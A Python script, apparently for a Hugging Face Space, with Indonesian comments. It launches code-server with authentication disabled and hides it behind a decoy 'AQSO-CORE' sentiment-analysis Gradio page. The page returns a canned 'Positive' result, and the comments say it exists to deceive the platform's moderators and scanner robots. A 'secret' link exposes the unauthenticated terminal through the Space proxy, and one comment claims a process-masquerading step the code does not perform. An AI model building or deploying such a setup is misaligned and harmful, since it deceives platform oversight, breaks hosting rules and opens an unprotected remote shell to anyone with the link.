| import subprocess | |
| import os | |
| import gradio as gr | |
| def start_shield(): | |
| # 1. MASQUERADING: Jalankan VS Code dengan nama proses palsu biar gak kedeteksi ps scan | |
| # VS Code ngumpet di port internal 8080 | |
| vsc_cmd = [ | |
| "code-server", | |
| "--auth", "none", | |
| "--bind-addr", "127.0.0.1:8080", | |
| "--user-data-dir", "/tmp/vsc", | |
| "--extensions-dir", "/tmp/ext", | |
| "--disable-telemetry" | |
| ] | |
| subprocess.Popen(vsc_cmd) | |
| # 2. DECOY AI: Tampilan depan port 7860 (Biar Robot HF senang) | |
| # Ini yang bakal diliat moderator & robot scanner. | |
| def research_engine(text): | |
| return f"AQSO-CORE v2.0 analyzed: {text} | Linguistic Pattern: Positive" | |
| with gr.Blocks(title="AQSO-CORE Linguistic Research") as demo: | |
| gr.Markdown("# 🔬 AQSO-CORE Research Engine") | |
| gr.Markdown("Advanced NLP and sentiment analysis environment.") | |
| input_box = gr.Textbox(label="Input Data") | |
| output_box = gr.Textbox(label="Analysis Result") | |
| btn = gr.Button("Analyze") | |
| btn.click(fn=research_engine, inputs=input_box, outputs=output_box) | |
| # TOMBOL RAHASIA (Cuma buat lu) | |
| gr.Markdown(f"[Terminal Access](https://{os.getenv('SPACE_ID').replace('/', '-')}.hf.space/proxy/8080/)") | |
| # Jalankan Decoy di port resmi HF | |
| demo.launch(server_name="0.0.0.0", server_port=7860, show_api=False) | |
| if __name__ == "__main__": | |
| start_shield() | |